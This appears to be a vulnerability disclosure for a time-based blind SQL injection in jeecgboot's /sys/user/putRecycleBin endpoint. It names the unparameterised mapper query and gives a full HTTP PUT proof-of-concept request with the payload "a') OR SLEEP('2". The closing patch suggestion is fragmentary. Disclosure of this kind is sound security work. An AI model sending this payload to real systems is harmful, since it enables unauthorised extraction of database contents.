jeecgboot
/sys/user/putRecycleBin is affected by sql injection
sysUserMapper.xml
revertLogicDeleted. You can see that no precompiling is performed
SysUserController.java
SysUserServiceImpl.java
So Users can pass in malicious parameters through http requests to achieve SQL injection
poc
The website will return immediately when the following content is passed in
After the following content is passed in, the website will return after a delay of 2 seconds
vuln
attack can user this to get data from database
payload:
PUT /jeecg-boot/sys/user/putRecycleBin HTTP/1.1 Host: 192.168.1.1:8088 Content-Length: 34 Request-Origion: Knife4j Accept: / knife4j-gateway-code: ROOT X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NjY2NjgzNjYsInVzZXJuYW1lIjoiYWRtaW4ifQ.WUx3LR8rvOp92_GueiJtlqtjV4tDRnOZos_-IAp34nA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Content-Type: application/json Origin: http://192.168.1.1:8088 Referer: http://192.168.1.1:8088/jeecg-boot/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Connection: close
{ "userIds": "a') OR SLEEP('2" }
patch
In (${}) It seems that this cannot be modified to precompile So it is recommended to add some keywords such as')
